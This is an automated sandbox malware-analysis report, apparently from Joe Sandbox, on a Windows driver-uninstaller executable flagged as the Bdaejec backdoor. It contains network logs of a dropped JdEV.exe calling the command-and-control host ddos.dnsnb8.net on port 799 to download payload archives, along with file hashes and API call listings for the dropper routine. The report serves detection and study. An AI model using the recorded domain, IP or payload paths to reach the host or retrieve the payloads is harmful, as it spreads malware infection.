SetTextColor, SetROP2, SetPolyFillMode, SetBkMode, SetBkColor, RestoreDC, SaveDC, DeleteObject, GetTextCharsetInfo, EnumFontFamiliesW, GetTextMetricsW, BitBlt, CreateCompatibleDC, CreateRectRgnIndirect, OffsetViewportOrgEx
MSIMG32.dll	TransparentBlt, AlphaBlend
COMDLG32.dll	GetFileTitleW
WINSPOOL.DRV	OpenPrinterW, DocumentPropertiesW, ClosePrinter
ADVAPI32.dll	RegEnumKeyExW, RegQueryValueExW, RegOpenKeyExW, RegCreateKeyExW, RegDeleteKeyW, RegSetValueExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegQueryValueW, RegEnumKeyW
SHELL32.dll	SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, DragFinish, DragQueryFileW, SHAppBarMessage, SHBrowseForFolderW, SHGetSpecialFolderLocation, SHGetDesktopFolder
COMCTL32.dll	ImageList_GetIconSize
SHLWAPI.dll	PathStripToRootW, PathIsUNCW, PathRemoveFileSpecW, PathFindFileNameW, PathFindExtensionW
ole32.dll	CoInitializeEx, DoDragDrop, CreateStreamOnHGlobal, OleLockRunning, IsAccelerator, OleTranslateAccelerator, OleDestroyMenuDescriptor, OleCreateMenuDescriptor, CoUninitialize, CoInitialize, CoCreateInstance, OleDuplicateData, CoTaskMemAlloc, ReleaseStgMedium, RevokeDragDrop, CoLockObjectExternal, RegisterDragDrop, OleGetClipboard, CoTaskMemFree, CoCreateGuid
OLEAUT32.dll	SysStringLen, VariantClear, VariantChangeType, VariantTimeToSystemTime, SystemTimeToVariantTime, SysAllocStringLen, VarBstrFromDate, VariantInit, SysAllocString, SysFreeString
gdiplus.dll	GdipGetImageGraphicsContext, GdipBitmapUnlockBits, GdipBitmapLockBits, GdipCreateBitmapFromScan0, GdipCreateBitmapFromStream, GdipGetImagePalette, GdipGetImagePaletteSize, GdipGetImagePixelFormat, GdipGetImageHeight, GdipGetImageWidth, GdipCloneImage, GdipDrawImageRectI, GdipSetInterpolationMode, GdipCreateFromHDC, GdiplusShutdown, GdiplusStartup, GdipCreateBitmapFromHBITMAP, GdipDisposeImage, GdipDeleteGraphics, GdipAlloc, GdipFree, GdipDrawImageI
OLEACC.dll	AccessibleObjectFromWindow, CreateStdAccessibleObject, LresultFromObject
IMM32.dll	ImmReleaseContext, ImmGetContext, ImmGetOpenStatus
WINMM.dll	PlaySoundW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
Chinese	China

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-07T06:01:12.995032+0100	2838522	ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup	1	192.168.2.11	64859	1.1.1.1	53	UDP
2025-01-07T06:01:13.644513+0100	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	1	192.168.2.11	49736	44.221.84.105	799	TCP
2025-01-07T06:01:17.906835+0100	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	1	192.168.2.11	49762	44.221.84.105	799	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 06:01:13.250835896 CET	49736	799	192.168.2.11	44.221.84.105
Jan 7, 2025 06:01:13.255666018 CET	799	49736	44.221.84.105	192.168.2.11
Jan 7, 2025 06:01:13.255748987 CET	49736	799	192.168.2.11	44.221.84.105
Jan 7, 2025 06:01:13.256761074 CET	49736	799	192.168.2.11	44.221.84.105
Jan 7, 2025 06:01:13.261558056 CET	799	49736	44.221.84.105	192.168.2.11
Jan 7, 2025 06:01:13.644340038 CET	799	49736	44.221.84.105	192.168.2.11
Jan 7, 2025 06:01:13.644388914 CET	799	49736	44.221.84.105	192.168.2.11
Jan 7, 2025 06:01:13.644512892 CET	49736	799	192.168.2.11	44.221.84.105
Jan 7, 2025 06:01:14.106909990 CET	49736	799	192.168.2.11	44.221.84.105
Jan 7, 2025 06:01:14.111707926 CET	799	49736	44.221.84.105	192.168.2.11
Jan 7, 2025 06:01:17.532310009 CET	49762	799	192.168.2.11	44.221.84.105
Jan 7, 2025 06:01:17.537163973 CET	799	49762	44.221.84.105	192.168.2.11
Jan 7, 2025 06:01:17.537236929 CET	49762	799	192.168.2.11	44.221.84.105
Jan 7, 2025 06:01:17.538038969 CET	49762	799	192.168.2.11	44.221.84.105
Jan 7, 2025 06:01:17.542890072 CET	799	49762	44.221.84.105	192.168.2.11
Jan 7, 2025 06:01:17.906630039 CET	799	49762	44.221.84.105	192.168.2.11
Jan 7, 2025 06:01:17.906646967 CET	799	49762	44.221.84.105	192.168.2.11
Jan 7, 2025 06:01:17.906835079 CET	49762	799	192.168.2.11	44.221.84.105
Jan 7, 2025 06:01:17.909173012 CET	49762	799	192.168.2.11	44.221.84.105
Jan 7, 2025 06:01:17.914071083 CET	799	49762	44.221.84.105	192.168.2.11

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 06:01:12.995032072 CET	64859	53	192.168.2.11	1.1.1.1
Jan 7, 2025 06:01:13.197349072 CET	53	64859	1.1.1.1	192.168.2.11

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 7, 2025 06:01:12.995032072 CET	192.168.2.11	1.1.1.1	0x809b	Standard query (0)	ddos.dnsnb8.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 7, 2025 06:01:08.653938055 CET	1.1.1.1	192.168.2.11	0xd406	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 7, 2025 06:01:08.653938055 CET	1.1.1.1	192.168.2.11	0xd406	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Jan 7, 2025 06:01:13.197349072 CET	1.1.1.1	192.168.2.11	0x809b	No error (0)	ddos.dnsnb8.net		44.221.84.105	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ddos.dnsnb8.net:799

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49736	44.221.84.105	799	7800	C:\Users\user\AppData\Local\Temp\JdEV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 06:01:13.256761074 CET	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.11	49762	44.221.84.105	799	7800	C:\Users\user\AppData\Local\Temp\JdEV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 06:01:17.538038969 CET	288	OUT	GET /cj//k2.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Target ID:	1
Start time:	00:01:11
Start date:	07/01/2025
Path:	C:\Users\user\Desktop\BXOZIGZEUa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\BXOZIGZEUa.exe"
Imagebase:	0x1c0000
File size:	1'700'352 bytes
MD5 hash:	FA07873F37B171A5567A9B4B3F2C65EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	00:01:11
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	00:01:11
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Temp\JdEV.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\JdEV.exe
Imagebase:	0x340000
File size:	15'872 bytes
MD5 hash:	56B2C3810DBA2E939A8BB9FA36D3CF96
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 97%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	00:01:17
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 1608
Imagebase:	0x4c0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	7.1%
Total number of Nodes:	1110
Total number of Limit Nodes:	21

Executed Functions

Function 001CE757 Relevance: 103.8, APIs: 48, Strings: 11, Instructions: 559
libraryloaderstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 001CE761

Part of subcall function 001D0431: __EH_prolog3.LIBCMT ref: 001D0438
Part of subcall function 001D0431: GetWindowDC.USER32(00000000,00000004,001CE19D,00000000,?,?,002F5254), ref: 001D0464

GetDeviceCaps.GDI32(?,00000058), ref: 001CE787
DeleteObject.GDI32(00000000), ref: 001CE7E8
DeleteObject.GDI32(00000000), ref: 001CE805
DeleteObject.GDI32(00000000), ref: 001CE822
DeleteObject.GDI32(00000000), ref: 001CE839
DeleteObject.GDI32(00000000), ref: 001CE856
DeleteObject.GDI32(00000000), ref: 001CE86D
DeleteObject.GDI32(00000000), ref: 001CE884
DeleteObject.GDI32(00000000), ref: 001CE89B
DeleteObject.GDI32(00000000), ref: 001CE8B8
DeleteObject.GDI32(00000000), ref: 001CE8CF
_memset.LIBCMT ref: 001CE8F0
GetTextCharsetInfo.GDI32(?,00000000,00000000), ref: 001CE900
lstrcpyW.KERNEL32(?,?), ref: 001CE94F
EnumFontFamiliesW.GDI32(?,00000000,Function_0000E70E), ref: 001CE976
lstrcpyW.KERNEL32(?), ref: 001CE986
EnumFontFamiliesW.GDI32(?,00000000,Function_0000E70E), ref: 001CE9A1
lstrcpyW.KERNEL32(?), ref: 001CE9B9
CreateFontIndirectW.GDI32(?), ref: 001CE9C5
CreateFontIndirectW.GDI32(?), ref: 001CEA15
CreateFontIndirectW.GDI32(?), ref: 001CEA5A
CreateFontIndirectW.GDI32(?), ref: 001CEA82
CreateFontIndirectW.GDI32(?), ref: 001CEA9F
GetSystemMetrics.USER32(00000048), ref: 001CEABA
lstrcpyW.KERNEL32(?), ref: 001CEACE
CreateFontIndirectW.GDI32(?), ref: 001CEAD4
GetStockObject.GDI32(00000011), ref: 001CEB02
GetObjectW.GDI32(?,0000005C,?), ref: 001CEB24
lstrcpyW.KERNEL32(?), ref: 001CEB5D
CreateFontIndirectW.GDI32(?), ref: 001CEB67
CreateFontIndirectW.GDI32(?), ref: 001CEB86
GetStockObject.GDI32(00000011), ref: 001CEB9C
GetObjectW.GDI32(?,0000005C,?), ref: 001CEBAD
CreateFontIndirectW.GDI32(?), ref: 001CEBB7
CreateFontIndirectW.GDI32(?), ref: 001CEBDA

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

__EH_prolog3_GS.LIBCMT ref: 001CEC65
GetVersionExW.KERNEL32(?,0000011C), ref: 001CEDBB
KiUserCallbackDispatcher.NTDLL(00001000), ref: 001CEDC6
GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 001CEE4B
GetProcAddress.KERNEL32(?,DrawThemeTextEx), ref: 001CEE5E
GetProcAddress.KERNEL32(?,BufferedPaintInit), ref: 001CEE71
GetProcAddress.KERNEL32(?,BufferedPaintUnInit), ref: 001CEE84
GetProcAddress.KERNEL32(?,BeginBufferedPaint), ref: 001CEE97
GetProcAddress.KERNEL32(?,EndBufferedPaint), ref: 001CEEAA
GetProcAddress.KERNEL32(00000000,DwmExtendFrameIntoClientArea), ref: 001CEEF3
GetProcAddress.KERNEL32(?,DwmDefWindowProc), ref: 001CEF06
GetProcAddress.KERNEL32(?,DwmIsCompositionEnabled), ref: 001CEF19

Strings

EndBufferedPaint, xrefs: 001CEE99
BufferedPaintUnInit, xrefs: 001CEE73
BufferedPaintInit, xrefs: 001CEE60
UxTheme.dll, xrefs: 001CEE2A
DwmExtendFrameIntoClientArea, xrefs: 001CEEED
dwmapi.dll, xrefs: 001CEED8
DrawThemeTextEx, xrefs: 001CEE4D
BeginBufferedPaint, xrefs: 001CEE86
DrawThemeParentBackground, xrefs: 001CEE45
DwmDefWindowProc, xrefs: 001CEEF5
DwmIsCompositionEnabled, xrefs: 001CEF08

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Object$Font$CreateDeleteIndirect$AddressProc$lstrcpy$EnumFamiliesH_prolog3H_prolog3_Stock$CallbackCapsCharsetDeviceDispatcherException@8InfoMetricsSystemTextThrowUserVersionWindow_memset
String ID: BeginBufferedPaint$BufferedPaintInit$BufferedPaintUnInit$DrawThemeParentBackground$DrawThemeTextEx$DwmDefWindowProc$DwmExtendFrameIntoClientArea$DwmIsCompositionEnabled$EndBufferedPaint$UxTheme.dll$dwmapi.dll
API String ID: 283818339-1174303547
Opcode ID: d95c768d3b0a653ca4c2baff279a5af1417e1e3e0504121f1e8bd73ed0f79ffd
Instruction ID: e238786531200dd1f4ca66e2f272c3d64e2cf1435b63c81d84619563ac1385f3
Opcode Fuzzy Hash: d95c768d3b0a653ca4c2baff279a5af1417e1e3e0504121f1e8bd73ed0f79ffd
Instruction Fuzzy Hash: AD3217B08017599FCB21DFB5C884BDAFBF8AF69700F00496EE5AAA7251DB709941CF50

Function 001C2540 Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 445
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetupDiGetClassDevsW.SETUPAPI(00000000,00000000,00000000,00000004), ref: 001C2572
SetupDiEnumDeviceInfo.SETUPAPI(00000000,00000000,0000001C), ref: 001C25C2
GetLastError.KERNEL32 ref: 001C25D6
GetLastError.KERNEL32 ref: 001C25E0
GetLastError.KERNEL32 ref: 001C25ED
SetupDiGetDeviceRegistryPropertyW.SETUPAPI(00000000,0000001C,00000001,00000000,00000000,00000000,?), ref: 001C2681
GetLastError.KERNEL32 ref: 001C268D
GetLastError.KERNEL32 ref: 001C2694
LocalFree.KERNEL32(?), ref: 001C26A7
LocalAlloc.KERNEL32(00000040,?), ref: 001C26B4
SetupDiGetDeviceRegistryPropertyW.SETUPAPI(?,0000001C,00000001,00000000,00000000,?,?), ref: 001C26DC
GetLastError.KERNEL32 ref: 001C26EA
SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 001C29F3

Strings

VID_1782, xrefs: 001C2798
Remove , xrefs: 001C286D, 001C291F
enum device err :, xrefs: 001C25F0
VID_18D1&PID_4EE7, xrefs: 001C27E2, 001C2807
VID_0525, xrefs: 001C27BD

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ErrorLast$Setup$Device$InfoLocalPropertyRegistry$AllocClassDestroyDevsEnumFreeList
String ID: Remove $VID_0525$VID_1782$VID_18D1&PID_4EE7$enum device err :
API String ID: 3295277273-2904152880
Opcode ID: a45a7baaad6d8a0884f1efe55ecaff973f04b7efc47d48121376960796db819c
Instruction ID: fb40342946de2898532c6c5faa1ec5d91aa1cc1a9bd568b369b8863206637b83
Opcode Fuzzy Hash: a45a7baaad6d8a0884f1efe55ecaff973f04b7efc47d48121376960796db819c
Instruction Fuzzy Hash: 65E1D371A002159FDB14DB68DC85FAEB7A5EFA4724F15461CE815EB2D0DB70ED02CBA0

Function 00366044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00366223
WriteFile.KERNELBASE(00000000,FFF58236,00003E00,?,00000000), ref: 00366252
CloseHandle.KERNELBASE(00000000), ref: 00366256
WinExec.KERNEL32(?,00000005), ref: 00366262

Strings

GetT, xrefs: 00366188
Crea, xrefs: 00366169
lstr, xrefs: 003661A7
dleA, xrefs: 003660D0
Kern, xrefs: 003660F4
el32, xrefs: 003660FB
catA, xrefs: 003661AF
JdEV.exe, xrefs: 003661FD, 00366200
WinE, xrefs: 00366110
odul, xrefs: 0036622D
Clos, xrefs: 00366129
athA, xrefs: 00366199
.dll, xrefs: 00366102
Writ, xrefs: 00366148
GetM, xrefs: 003660B6

Memory Dump Source

Source File: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: File$CloseCreateExecHandleWrite
String ID: .dll$Clos$Crea$GetM$GetT$JdEV.exe$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul
API String ID: 3741012433-349371505
Opcode ID: 0d78d3566c40cb484947d4d33a09a86410937cd62f88d763635a65b8d9c49c74
Instruction ID: e87948d43ad4e0595ccaa8070021cdedf5383e362ad75b41eeac699a0c8a8e6d
Opcode Fuzzy Hash: 0d78d3566c40cb484947d4d33a09a86410937cd62f88d763635a65b8d9c49c74
Instruction Fuzzy Hash: 4F616E74D01215DFCF25CF94C886AADFBB4BF45391F26C2AAD405AB60AC7709E81CB91

Function 001CB7F2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 124
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(?,?,00000000,00000000), ref: 001CB85E
SetLastError.KERNEL32(0000007B,00000000,?,?,00000104,?,?,?,00000000,00000000), ref: 001CB86D

Part of subcall function 001C8E6A: _malloc.LIBCMT ref: 001C8E88

FindFirstFileW.KERNELBASE(?,?,?,?,?,00000000,00000000), ref: 001CB87A
GetLastError.KERNEL32(?,?,?,00000000,00000000), ref: 001CB888
__wfullpath.LIBCMT ref: 001CB8D4
__wsplitpath_s.LIBCMT ref: 001CB914
__wmakepath_s.LIBCMT ref: 001CB933

Part of subcall function 001CB3FE: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000104,?,001CB85B,?,?,?,?,?,00000000,00000000), ref: 001CB412
Part of subcall function 001CB3FE: GetProcAddress.KERNEL32(00000000,FindFirstFileTransactedW), ref: 001CB422

Strings

8)1, xrefs: 001CB827, 001CB834, 001CB851

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ErrorLast$AddressFileFindFirstHandleModuleProc__wfullpath__wmakepath_s__wsplitpath_s_malloclstrlen
String ID: 8)1
API String ID: 1521982810-3231838955
Opcode ID: e74df7e82280d02d469b8ddfdb8d65563e4e5d91da78354bc8232bb0321d9edc
Instruction ID: 2b5151b29e00818c8879d4cba3b53d667ec63c20e9412e75c05091939c20099f
Opcode Fuzzy Hash: e74df7e82280d02d469b8ddfdb8d65563e4e5d91da78354bc8232bb0321d9edc
Instruction Fuzzy Hash: F641BF71A04218BBCB10AB758CCAFAFB7ACEF68310F10456DF51AD6192DB74D950CBA1

Function 001C1020 Relevance: 99.0, APIs: 31, Strings: 25, Instructions: 952filestringCOMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(00000000,6B722804), ref: 001C1057
GetModuleHandleW.KERNEL32(00000000,00000000,00000000), ref: 001C1060

Part of subcall function 001CA2C5: SetErrorMode.KERNELBASE(00000000,?,?,001C106C,00000000), ref: 001CA2D3
Part of subcall function 001CA2C5: SetErrorMode.KERNELBASE(00000000,?,?,001C106C,00000000), ref: 001CA2DB

_wprintf.LIBCMT ref: 001C1075
GetWindowsDirectoryW.KERNEL32(?,00000104,00312A58,00000000), ref: 001C10D0
GetLastError.KERNEL32 ref: 001C10DE
_wcsnlen.LIBCMT ref: 001C11A9
_memset.LIBCMT ref: 001C1245
_wcsrchr.LIBCMT ref: 001C12E8
lstrlenW.KERNEL32(?,?,00000001,?,?), ref: 001C13BF
WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,?,00000000,00000000,?,?), ref: 001C13ED
lstrlenW.KERNEL32(?,0000000A,?,?,?,00000001,?,?), ref: 001C148F
WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,00000000,00000000,00000000,?,?,?,00000001,?,?), ref: 001C14BD
SetupUninstallOEMInfW.SETUPAPI(?,00000001,00000000,0000000A,?,?,?,0000000A,?,?,?,00000001,?,?), ref: 001C153F
lstrlenW.KERNEL32(00000000,0000000A,00000000,?,00000000,?,?,?,0000000A,?,?,?,00000001,?,?), ref: 001C15C4
WideCharToMultiByte.KERNEL32(00000003,00000000,00000000,000000FF,?,?,00000000,00000000,?,00000000,?,?,?,0000000A), ref: 001C15F2
DeleteFileW.KERNEL32(?,0000000A,?,?,?,00000000,?,00000000,?,?,?,0000000A,?,?,?,00000001), ref: 001C168A
DeleteFileW.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,0000000A,?,?,?,00000001), ref: 001C1693
DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 001C1715
DeleteFileW.KERNELBASE(?), ref: 001C1757
DeleteFileW.KERNELBASE(?), ref: 001C1799
DeleteFileW.KERNELBASE(?), ref: 001C17DB

Part of subcall function 001C1FF0: SetupOpenInfFileW.SETUPAPI(?,00000000,00000002,00000000), ref: 001C2089

DeleteFileW.KERNELBASE(?), ref: 001C181D
DeleteFileW.KERNELBASE(?), ref: 001C185F
DeleteFileW.KERNELBASE(?), ref: 001C18A1
DeleteFileW.KERNELBASE(?), ref: 001C18E3
DeleteFileW.KERNELBASE(?), ref: 001C1925
DeleteFileW.KERNELBASE(?), ref: 001C1967
DeleteFileW.KERNELBASE(?), ref: 001C19A9
DeleteFileW.KERNELBASE(?), ref: 001C19EB
DeleteFileW.KERNELBASE(?), ref: 001C1A2D
DeleteFileW.KERNELBASE(?), ref: 001C1A6F

Strings

P, xrefs: 001C12B6
\sprdmux.sys, xrefs: 001C17FF
vector<T> too long, xrefs: 001C1FDB
\usbcommsprdserial.sys, xrefs: 001C1A51
*.*, xrefs: 001C1C15
Uninstall , xrefs: 001C13FE, 001C14CE
GetWindowsDirectory error:, xrefs: 001C10E5
\system32\drivers, xrefs: 001C16D5
\sprdvcomIOT.sys, xrefs: 001C1A0F
\sprd_enum.sys, xrefs: 001C1907
Fatal Error: MFC initialization failed, xrefs: 001C1070
\rdavcom.sys, xrefs: 001C177B
\inf, xrefs: 001C11FD
\sprdport.sys, xrefs: 001C17BD
Remove , xrefs: 001C154E, 001C160F
\sprd_rdavcom.sys, xrefs: 001C1949
\sprd_wvmdm.sys, xrefs: 001C19CD
\sprd_wvcom.sys, xrefs: 001C198B
\sprdvmdm.sys, xrefs: 001C1739
\sprd_acm.sys, xrefs: 001C18C5
\sprdvcom.sys, xrefs: 001C16ED
\sprdbus.sys, xrefs: 001C1841
oem, xrefs: 001C1CBD
.inf, xrefs: 001C1D0A
\sprdmodem.sys, xrefs: 001C1883

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: File$Delete$ByteCharErrorMultiWidelstrlen$ModeSetup$CommandDirectoryHandleLastLineModuleOpenUninstallWindows_memset_wcsnlen_wcsrchr_wprintf
String ID: *.*$.inf$Fatal Error: MFC initialization failed$GetWindowsDirectory error:$P$Remove $Uninstall $\inf$\rdavcom.sys$\sprd_acm.sys$\sprd_enum.sys$\sprd_rdavcom.sys$\sprd_wvcom.sys$\sprd_wvmdm.sys$\sprdbus.sys$\sprdmodem.sys$\sprdmux.sys$\sprdport.sys$\sprdvcom.sys$\sprdvcomIOT.sys$\sprdvmdm.sys$\system32\drivers$\usbcommsprdserial.sys$oem$vector<T> too long
API String ID: 254025050-405532366
Opcode ID: 9fa65de33b8b4e12bb5c672ed9122fce962cb6050969229b9356586761feca4c
Instruction ID: 62e074dd74f7d95ca4e9eba58947a7360e945b14cb4e0a3aa9bdc96a64b501f4
Opcode Fuzzy Hash: 9fa65de33b8b4e12bb5c672ed9122fce962cb6050969229b9356586761feca4c
Instruction Fuzzy Hash: 3472C170A40604AFD714DB68CC85FAAB3B5FFA9324F148698E0199B2D2DB31ED41CF90

Function 001CE141 Relevance: 64.8, APIs: 43, Instructions: 304
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

